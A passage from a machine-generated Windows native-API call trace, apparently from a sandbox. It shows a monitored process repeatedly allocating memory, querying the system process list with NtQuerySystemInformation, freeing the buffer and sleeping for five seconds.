Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0271.129] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0271.130] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0271.132] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0271.132] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0271.133] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0271.133] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0271.134] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0271.140] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0271.141] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0271.143] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0271.144] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0271.145] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0271.145] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0271.145] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0271.151] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0271.152] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0271.154] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0271.154] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0271.155] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0271.155] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0271.155] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0271.160] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0271.161] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0271.163] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0271.163] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0271.164] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0271.164] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0271.164] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0271.170] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0271.170] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0271.172] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0271.172] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0271.173] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0271.174] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0271.174] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0271.179] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0271.180] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0271.181] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0271.182] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0271.183] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0271.183] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0271.183] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0271.188] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0271.189] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0271.190] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0271.190] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0271.191] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0271.191] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0271.192] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0271.197] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0271.198] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0271.200] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0271.200] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0271.201] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0271.201] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0271.202] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0271.206] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0271.207] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0271.209] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0271.210] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0271.211] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0271.211] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0271.211] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0271.216] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0271.217] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0271.218] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0271.218] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0271.219] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0271.220] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0271.220] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0271.224] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0271.225] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0271.227] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0271.228] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0271.229] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0271.229] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0271.229] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0271.234] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0271.235] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0271.238] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0271.238] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0271.239] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0271.240] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0271.240] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0271.246] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0271.247] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0271.249] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0271.249] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0271.250] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0271.250] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0271.250] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0271.255] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0271.256] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0271.257] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0271.257] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0271.259] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0271.259] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0271.259] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0271.264] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0271.265] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0271.267] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0271.267] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0271.268] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0271.268] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0271.269] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0271.274] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0271.275] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0271.276] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0271.276] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0271.277] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0271.278] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0271.278] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0271.284] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0271.285] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0271.287] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0271.287] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0271.288] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0271.288] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0271.289] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0271.293] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0271.294] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0271.295] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0271.296] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0271.297] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0271.297] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0271.297] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0271.302] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0271.303] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0271.305] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0271.305] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0271.306] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0271.306] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0271.306] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0271.311] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0271.312] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0271.313] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0271.313] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0271.314] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0271.314] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0271.315] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0271.318] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0271.319] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0271.320] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0271.320] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0271.321] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) 